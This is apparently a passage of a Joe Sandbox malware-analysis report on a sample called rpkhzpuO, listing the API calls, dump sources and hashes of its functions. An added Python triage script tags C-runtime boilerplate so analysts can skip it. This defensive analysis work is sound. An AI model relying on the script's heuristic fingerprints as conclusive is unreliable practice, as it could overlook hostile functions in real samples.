• TlsGetValue.KERNEL32(FFFFFFFF,?,004104E7,00000000,00413B8E,00423648,00000000,00000314,?,0040EC11,00423648,Microsoft Visual C++ Runtime Library,00012010), ref: 00410497
• GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004104E7,00000000,00413B8E,00423648,00000000,00000314,?,0040EC11,00423648,Microsoft Visual C++ Runtime Library,00012010), ref: 004104AD
• GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 004104C8
Strings
Memory Dump Source
• Source File: 00000004.00000001.22963397742.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.22963397742.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.22963397742.000000000045A000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_rpkhzpuO.jbxd
Yara matches
Similarity
• API ID: Value$AddressHandleModuleProc
• String ID: EncodePointer$KERNEL32.DLL
• API String ID: 1929421221-3682587211
APIs
• TlsGetValue.KERNEL32(00000000,?,00410584,?,00000001,0040BFC6,0040B72C), ref: 004104FB
• TlsGetValue.KERNEL32(FFFFFFFF,?,00410584,?,00000001,0040BFC6,0040B72C), ref: 00410512
• GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00410584,?,00000001,0040BFC6,0040B72C), ref: 00410528
• GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 00410543
Strings
Memory Dump Source
• Source File: 00000004.00000001.22963397742.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.22963397742.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.22963397742.000000000045A000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_rpkhzpuO.jbxd
Yara matches
Similarity
• API ID: Value$AddressHandleModuleProc
• String ID: DecodePointer$KERNEL32.DLL
• API String ID: 1929421221-629428536
APIs
• GetStringTypeW.KERNEL32(00000001,00420398,00000001,?,?,?,0041219E,?,?,?,00417655,00000001,?,00000000,?,?), ref: 0041749A
• GetLastError.KERNEL32(?,00417655,00000001,?,00000000,?,?,?,?,00000000,?,00000001,00000000,00000000,00000008,00000000), ref: 004174AC
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,0041219E,?,?,?,00417655,00000001,?,00000000), ref: 00417511
• MultiByteToWideChar.KERNEL32(00000000,00000001,?,00000000,00000000,00000000,?,?,00000000,?,00000001,00000000,00000000,00000008,00000000,00000000), ref: 0041757B
• GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00417589
• GetStringTypeA.KERNEL32(?,?,?,?,?,?,?,0041219E,?,?,?,00417655,00000001,?,00000000,?), ref: 004175FE
  • Part of subcall function 00417A69: GetCPInfo.KERNEL32(?,00000000,?,00000000,00000000,0041219E,?,?,?,00417655,00000001,?,00000000,?,?,?), ref: 00417AB4
  • Part of subcall function 00417A69: GetCPInfo.KERNEL32(?,00000001,?,00417655,00000001,?), ref: 00417ACD
  • Part of subcall function 00417A69: MultiByteToWideChar.KERNEL32(?,00000001,?,00417655,?,00000000,?,?,?,?,?,?,?,00417655,00000001,?), ref: 00417B7A
  • Part of subcall function 00417A69: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,00417655), ref: 00417B95
Memory Dump Source
• Source File: 00000004.00000001.22963397742.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.22963397742.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.22963397742.000000000045A000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_rpkhzpuO.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide$StringType$Info$ErrorLast
• String ID:
• API String ID: 2250435928-0
APIs
  • Part of subcall function 00414F8F: SetFilePointer.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,0040F2F5,?,00000000,00000000,00000002,00000000,00000000), ref: 00414FD1
  • Part of subcall function 00414F8F: GetLastError.KERNEL32(?,0040F2F5,?,00000000,00000000,00000002,00000000,00000000,?,?,0040F9E3,?,?,?,004212E0,00000010), ref: 00414FDE
• GetProcessHeap.KERNEL32(00000008,00001000,?,?,?,?,?,00021D40,00000109,00000000,?,?,00415E9E,00000109,00000109), ref: 00417F4A
• HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00021D40,00000109,00000000,?,?,00415E9E,00000109,00000109), ref: 00417F51
• GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00021D40,00000109,00000000,?,?,00415E9E), ref: 00417FCD
• HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,00021D40,00000109,00000000,?,?,00415E9E,00000109), ref: 00417FD4
• SetEndOfFile.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00021D40,00000109,00000000,?,?,00415E9E), ref: 0041802F
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00021D40,00000109,00000000,?,?,00415E9E,00000109), ref: 0041805C
Memory Dump Source
• Source File: 00000004.00000001.22963397742.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.22963397742.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.22963397742.000000000045A000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_rpkhzpuO.jbxd
Yara matches
Similarity
• API ID: Heap$ErrorFileLastProcess$AllocFreePointer
• String ID:
• API String ID: 1354853467-0
                                                                                                                                        APIs
                                                                                                                                        • GetStartupInfoA.KERNEL32(?), ref: 00411A2A
                                                                                                                                          • Part of subcall function 00411CBA: Sleep.KERNEL32(00000000), ref: 00411CE2
                                                                                                                                        • GetFileType.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,?,?,?,004211C0,00000014), ref: 00411B54
                                                                                                                                        • GetStdHandle.KERNEL32(-000000F6,?,?,?,?,?,?,?,?,?,?,?,?,004211C0,00000014), ref: 00411BDE
                                                                                                                                        • GetFileType.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,004211C0,00000014), ref: 00411BF0
                                                                                                                                        • SetHandleCount.KERNEL32 ref: 00411C48
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000001.22963397742.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000001.22963397742.0000000000426000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                        • Associated: 00000004.00000001.22963397742.000000000045A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_1_400000_rpkhzpuO.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileHandleType$CountInfoSleepStartup
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1302456922-0
                                                                                                                                        • Opcode ID: fe812b23e2170bcdb639b9148777db5a3ee067828d9054d27ca0d7f29e7dd927
                                                                                                                                        • Instruction ID: 27b0fbd889795d5f1e06f4fdcd6398a7712fe8e1a2363047ed790b1c64620eeb
                                                                                                                                        • Opcode Fuzzy Hash: fe812b23e2170bcdb639b9148777db5a3ee067828d9054d27ca0d7f29e7dd927
                                                                                                                                        • Instruction Fuzzy Hash: 897128719087458FD7208F28D944B9A7BF0AF06324F29435AD6659B3F1E73CE882CB59
                                                                                                                                        APIs
                                                                                                                                        • WriteConsoleW.KERNEL32(FFFFFFFE,?,00000001,?,00000000,00000000,?), ref: 00415222
                                                                                                                                        • GetLastError.KERNEL32 ref: 00415235
                                                                                                                                        • GetConsoleOutputCP.KERNEL32(00000000,?,00000001,?,00000005,00000000,00000000,00000000,?), ref: 00415255
                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000), ref: 0041525C
                                                                                                                                        • WriteConsoleA.KERNEL32(FFFFFFFE,?,00000000,00000000,00000000), ref: 00415278
                                                                                                                                          • Part of subcall function 00417E95: CreateFileA.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00415205,00000000,?), ref: 00417EA8
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000001.22963397742.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000001.22963397742.0000000000426000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                        • Associated: 00000004.00000001.22963397742.000000000045A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_1_400000_rpkhzpuO.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Console$Write$ByteCharCreateErrorFileLastMultiOutputWide
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1850339568-0
                                                                                                                                        • Opcode ID: f682b99e5bacf2e74930e8e62dfc2c4e3e74e49b32a4a4fec7347cea4f2df7ff
                                                                                                                                        • Instruction ID: 953df2ca3249f817f9cc39bcae46d22c6297729a51a0c9a14b81a97457889855
                                                                                                                                        • Opcode Fuzzy Hash: f682b99e5bacf2e74930e8e62dfc2c4e3e74e49b32a4a4fec7347cea4f2df7ff
                                                                                                                                        • Instruction Fuzzy Hash: 7821A132601504FBC7209FA0DD48DFB7779EB4A360B50026AF521921D0DB789A85CBAD
                                                                                                                                        APIs
                                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00412A4C
                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 00412A58
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00412A60
                                                                                                                                        • GetTickCount.KERNEL32 ref: 00412A68
                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 00412A74
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000001.22963397742.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000001.22963397742.0000000000426000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                        • Associated: 00000004.00000001.22963397742.000000000045A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_1_400000_rpkhzpuO.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1445889803-0
                                                                                                                                        • Opcode ID: bb3996daa0d213e17ce3a3e218643ddcd14062b4abd885261761fa903bb87a28
                                                                                                                                        • Instruction ID: 5c27a2b13baadd668e239a7c5dd4fee296557c3666ee481e1803dacbd7225632
                                                                                                                                        • Opcode Fuzzy Hash: bb3996daa0d213e17ce3a3e218643ddcd14062b4abd885261761fa903bb87a28
                                                                                                                                        • Instruction Fuzzy Hash: 69115672E00224ABDB209BF4DE486DFB7A4EF48391F960562D411E7210DB749D5187D9
                                                                                                                                        APIs
                                                                                                                                        • EntryPoint.RPKHZPUO(80070057), ref: 004017EE
                                                                                                                                          • Part of subcall function 00401030: RaiseException.KERNEL32(?,00000001,00000000,00000000,00000015,-30B19E70,2C2D8410), ref: 0040101C
                                                                                                                                          • Part of subcall function 00401030: GetLastError.KERNEL32 ref: 00401030
                                                                                                                                        • EntryPoint.RPKHZPUO(80070057), ref: 00401800
                                                                                                                                        • EntryPoint.RPKHZPUO(80070057), ref: 00401813
                                                                                                                                        • EntryPoint.RPKHZPUO(8007000E), ref: 00401839
                                                                                                                                        • EntryPoint.RPKHZPUO(8007000E), ref: 00401853
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000001.22963397742.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000001.22963397742.0000000000426000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                        • Associated: 00000004.00000001.22963397742.000000000045A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_1_400000_rpkhzpuO.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: EntryPoint$ErrorExceptionLastRaise
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3553297507-0
                                                                                                                                        • Opcode ID: a5ad3cd8a15542cfcc4b59831b28fc936e8548016bd987b06b7189672beebcc8
                                                                                                                                        • Instruction ID: 9b44c07ae4757e317c030d83b628f3e382e80143504443e1f3b2735d650bea0f
                                                                                                                                        • Opcode Fuzzy Hash: a5ad3cd8a15542cfcc4b59831b28fc936e8548016bd987b06b7189672beebcc8
                                                                                                                                        • Instruction Fuzzy Hash: AC018872500241EACA21BA229C06F1B7294DF90799F24893FF4C5762E2D63D9990D6EE
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000001.22963397742.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000001.22963397742.0000000000426000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                        • Associated: 00000004.00000001.22963397742.000000000045A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_1_400000_rpkhzpuO.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                        • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                                        • API String ID: 1646373207-3105848591
                                                                                                                                        • Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                                        • Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
                                                                                                                                        • Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                                        • Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                                        • GetLastError.KERNEL32(?,0040D212,00000000,00000010,?,?,?,0040D29E,0040AFB2,00421200,0000000C,0040D2CA,0040AFB2,?,0040AFB2), ref: 0040E4CA
                                                                                                                                        • GetLastError.KERNEL32(?,0040D212,00000000,00000010,?,?,?,0040D29E,0040AFB2,00421200,0000000C,0040D2CA,0040AFB2,?,0040AFB2), ref: 0040E557
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000001.22963397742.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000001.22963397742.0000000000426000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                        • Associated: 00000004.00000001.22963397742.000000000045A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_1_400000_rpkhzpuO.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$AllocateHeap
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4219743298-0
                                                                                                                                        • Opcode ID: 21f6e1cdbb20672dfdd0fe6bd8d933b3c40773d1f4ce881146cc449c7a206cbd
                                                                                                                                        • Instruction ID: 24b6ce6606a44b70c861ee7e64875c3263351e3a18f4392c585e1da245e73565
                                                                                                                                        • Opcode Fuzzy Hash: 21f6e1cdbb20672dfdd0fe6bd8d933b3c40773d1f4ce881146cc449c7a206cbd
                                                                                                                                        • Instruction Fuzzy Hash: 1751D371D00625AACF217FB79C04A6F7A64EF50368B104D3BF854B72D2E73C89518A9D
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00414070: GetOEMCP.KERNEL32(00000000,?,004127F1), ref: 00414099
                                                                                                                                          • Part of subcall function 00411C75: Sleep.KERNEL32(00000000,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB,00000001,-0000000F,?,0040E2B2,00000004,00421260,0000000C), ref: 00411C96
                                                                                                                                        • InterlockedDecrement.KERNEL32(CBE85013), ref: 00414347
                                                                                                                                        • InterlockedIncrement.KERNEL32(00000000), ref: 0041436C
                                                                                                                                        • InterlockedDecrement.KERNEL32 ref: 004143FE
                                                                                                                                        • InterlockedIncrement.KERNEL32(00000000), ref: 00414422
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000001.22963397742.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000001.22963397742.0000000000426000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                        • Associated: 00000004.00000001.22963397742.000000000045A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_1_400000_rpkhzpuO.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Interlocked$DecrementIncrement$Sleep
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 327565842-0
                                                                                                                                        • Opcode ID: 1ac3cf69a75a00068bc07650feaee45903014390a969cb25a4eb59365c4c170b
                                                                                                                                        • Instruction ID: ef8407f637ce398c8a034388d495f59de4d12d861d32ab62094bbbe6976ba705
                                                                                                                                        • Opcode Fuzzy Hash: 1ac3cf69a75a00068bc07650feaee45903014390a969cb25a4eb59365c4c170b
                                                                                                                                        • Instruction Fuzzy Hash: 3C41E570A002149BCB20AF75D9807DA7BF0FF88314F50886BE955EB2A1C77D98C28B5C
                                                                                                                                        APIs
                                                                                                                                        • GetCPInfo.KERNEL32(?,?,00000000,?), ref: 00413E5A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000001.22963397742.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000001.22963397742.0000000000426000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                        • Associated: 00000004.00000001.22963397742.000000000045A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_1_400000_rpkhzpuO.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Info
                                                                                                                                        • String ID: $bBA
                                                                                                                                        • API String ID: 1807457897-2691998655
                                                                                                                                        • Opcode ID: a75a759ca75c92b4cf3da8d4d8bcebf6a9778298300296b705959df042819b67
                                                                                                                                        • Instruction ID: 52c6045e8425aa0881b7be24359a39c5100ada617ead2fe5fbcefb6b32b9ff45
                                                                                                                                        • Opcode Fuzzy Hash: a75a759ca75c92b4cf3da8d4d8bcebf6a9778298300296b705959df042819b67
                                                                                                                                        • Instruction Fuzzy Hash: 51412AB150075C9EDB218F24CD84FFBBBF89B05709F1444EEE58683182D2799B8A8F59
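The function records above are raw sandbox output, and most of the API sets they show (the GetSystemTimeAsFileTime/GetCurrentProcessId/GetCurrentThreadId/GetTickCount/QueryPerformanceCounter group, the GetStartupInfoA/GetFileType/GetStdHandle/SetHandleCount group, the console write path) are what the MSVC C runtime does at start-up in any statically linked binary, not behaviour specific to this sample. The following is an added example, not code from the Joe Sandbox report or from the analysed sample: a Python triage script that parses records in this layout and tags the ones whose API set matches a CRT start-up helper, so an analyst can skip them and spend time on the rest. The CRT fingerprints are the example's own heuristics, the reading of `RPKHZPUO` as the name of the dumped module rather than a system DLL is an assumption, and the input is constructed from three records copied from this page.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed input: three function records reproduced from this page in the
# report's own layout (bullets, "ref:" addresses, a "Similarity" block).
SAMPLE_LISTING = """\
APIs
• GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00412A4C
• GetCurrentProcessId.KERNEL32 ref: 00412A58
• GetCurrentThreadId.KERNEL32 ref: 00412A60
• GetTickCount.KERNEL32 ref: 00412A68
• QueryPerformanceCounter.KERNEL32(?), ref: 00412A74
Memory Dump Source
• Source File: 00000004.00000001.22963397742.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
• String ID:
• Opcode ID: bb3996daa0d213e17ce3a3e218643ddcd14062b4abd885261761fa903bb87a28
APIs
• EntryPoint.RPKHZPUO(80070057), ref: 004017EE
  • Part of subcall function 00401030: RaiseException.KERNEL32(?,00000001,00000000,00000000,00000015,-30B19E70,2C2D8410), ref: 0040101C
  • Part of subcall function 00401030: GetLastError.KERNEL32 ref: 00401030
• EntryPoint.RPKHZPUO(8007000E), ref: 00401839
Similarity
• API ID: EntryPoint$ErrorExceptionLastRaise
• Opcode ID: a5ad3cd8a15542cfcc4b59831b28fc936e8548016bd987b06b7189672beebcc8
APIs
• GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
• GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
Similarity
• API ID: AddressHandleModuleProc
• String ID: IsProcessorFeaturePresent$KERNEL32
• Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
"""

# One "Name.MODULE(args), ref: ADDR" line, optionally prefixed by the
# "Part of subcall function XXXX:" marker the report uses for callee APIs.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")
HEX_RE = re.compile(r"-?[0-9A-Fa-f]{8}")  # handles / return slots, not names

@dataclass
class Call:
    name: str
    module: str
    args: str
    ref: str
    subcall: Optional[str]  # address of the callee when the API is reached indirectly

@dataclass
class FunctionRecord:
    calls: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)  # "API ID", "Opcode ID", "Source File", ...

def parse_listing(text: str) -> list:
    """Split a Joe Sandbox function listing into records, one per 'APIs' header."""
    records, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = FunctionRecord()
            records.append(cur)
            continue
        if cur is None:
            continue
        if m := API_RE.match(line):
            cur.calls.append(Call(m["name"], m["module"], m["args"] or "", m["ref"], m["sub"]))
        elif m := FIELD_RE.match(line):
            cur.fields[m["key"]] = m["val"].strip()
    return records

# Assumption: anything not in this set is the dumped image itself (here RPKHZPUO).
SYSTEM_MODULES = {"KERNEL32", "KERNELBASE", "NTDLL", "USER32", "ADVAPI32", "GDI32",
                  "OLE32", "SHELL32", "WS2_32", "MSVCRT"}

# Heuristic fingerprints for MSVC CRT start-up helpers (assumption: the set of
# APIs a function touches is enough to recognise it; confirm in the disassembly
# before discarding anything).
CRT_FINGERPRINTS = {
    "CRT security-cookie seed (__security_init_cookie)":
        {"GetSystemTimeAsFileTime", "GetCurrentProcessId", "GetCurrentThreadId",
         "GetTickCount", "QueryPerformanceCounter"},
    "CRT stdio handle setup (_ioinit)":
        {"GetStartupInfoA", "GetFileType", "GetStdHandle", "SetHandleCount"},
    "CRT console write path":
        {"WriteConsoleW", "GetConsoleOutputCP", "WideCharToMultiByte", "WriteConsoleA"},
}
# Exports the CRT itself resolves by name; extend as you meet more of them.
CRT_PROBED_EXPORTS = {"IsProcessorFeaturePresent"}

def classify(rec: FunctionRecord) -> tuple:
    """Return (verdict, reason); verdict is 'crt-noise' or 'review'."""
    names = {c.name for c in rec.calls}
    for label, fingerprint in CRT_FINGERPRINTS.items():
        if fingerprint <= names:
            return "crt-noise", label
    if "GetProcAddress" in names:
        targets = {a for c in rec.calls if c.name == "GetProcAddress"
                   for a in c.args.split(",") if a and a != "?" and not HEX_RE.fullmatch(a)}
        if targets and targets <= CRT_PROBED_EXPORTS:
            return "crt-noise", "CRT feature probe via GetProcAddress"
        # Any other resolved name is how loaders hide imports: always look at it.
        return "review", "dynamic import resolution: " + (", ".join(sorted(targets)) or "target not recovered")
    foreign = sorted({f"{c.name}.{c.module}" for c in rec.calls if c.module not in SYSTEM_MODULES})
    if foreign:
        return "review", "calls into non-system module: " + ", ".join(foreign)
    return "review", "no CRT fingerprint matched"

def triage(text: str) -> list:
    """Parse a listing and tag each record; the first 'ref' locates it in the dump."""
    out = []
    for rec in parse_listing(text):
        verdict, reason = classify(rec)
        out.append({"first_ref": rec.calls[0].ref if rec.calls else None,
                    "opcode_id": rec.fields.get("Opcode ID", "")[:12],
                    "verdict": verdict, "reason": reason})
    return out

if __name__ == "__main__":
    for row in triage(SAMPLE_LISTING):
        print(f"{row['first_ref']}  {row['opcode_id']}  {row['verdict']:9}  {row['reason']}")
```

Run against the three constructed records, the first and third are tagged `crt-noise` and only the `EntryPoint.RPKHZPUO` record is left for review. The third is discarded solely because the name handed to GetProcAddress is `IsProcessorFeaturePresent`; with any other target the same GetModuleHandleA/GetProcAddress pair is reported as dynamic import resolution, which is the behaviour worth an analyst's attention in a packed sample.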
                                                                                                                                        APIs
                                                                                                                                        • DeleteCriticalSection.KERNEL32 ref: 0040D5CC
                                                                                                                                        • DeleteCriticalSection.KERNEL32 ref: 0040D5F6
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000001.22963397742.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000001.22963397742.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000001.22963397742.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_1_400000_rpkhzpuO.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalDeleteSection
                                                                                                                                        • String ID: @
                                                                                                                                        • API String ID: 166494926-1615503679
                                                                                                                                        • Opcode ID: 7526e4d3dbcc190cfac878923c5a31712b949e4b7f11fd427bac071a9b25d37d
                                                                                                                                        • Instruction ID: 9eeb78a0cbe44b7cd63f1801abc478ec2ac12bfb37c42c527eb79f6e2b7b0d99
                                                                                                                                        • Opcode Fuzzy Hash: 7526e4d3dbcc190cfac878923c5a31712b949e4b7f11fd427bac071a9b25d37d
                                                                                                                                        • Instruction Fuzzy Hash: 69F0E2B3D00321B7C7345A596C84567B2A88F9072A395403FDCA8B7280877E8C8886AE
                                                                                                                                        APIs
                                                                                                                                        • HeapReAlloc.KERNEL32(00000000,?,00021920,00000000,0040DFB9,00021920,00000001,00000000), ref: 0040DA80
                                                                                                                                        • HeapAlloc.KERNEL32(00000008,000041C4,00021920,00000000,0040DFB9,00021920,00000001,00000000), ref: 0040DAB6
                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 0040DAD0
                                                                                                                                        • HeapFree.KERNEL32(00000000,?), ref: 0040DAE7
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000001.22963397742.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000001.22963397742.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000001.22963397742.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_1_400000_rpkhzpuO.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocHeap$FreeVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3499195154-0
                                                                                                                                        • Opcode ID: 9b5c81dbc51e698318c7dad427188dbb4a23983c96b18bada707d7d15dac696f
                                                                                                                                        • Instruction ID: 0f3031a8d49e428019a005922f7f9a8923364d0b5993188e1ef698a85f99edc9
                                                                                                                                        • Opcode Fuzzy Hash: 9b5c81dbc51e698318c7dad427188dbb4a23983c96b18bada707d7d15dac696f
                                                                                                                                        • Instruction Fuzzy Hash: 9F119072B00700DFC7319F24EC05A167BB5F758721751453AE696E32B0D334584A8F9C
                                                                                                                                        • Opcode Fuzzy Hash: 2add62498bfc0ca075e700888fd9f977c3cc0dfae671918fed2a60f0c8815d7e
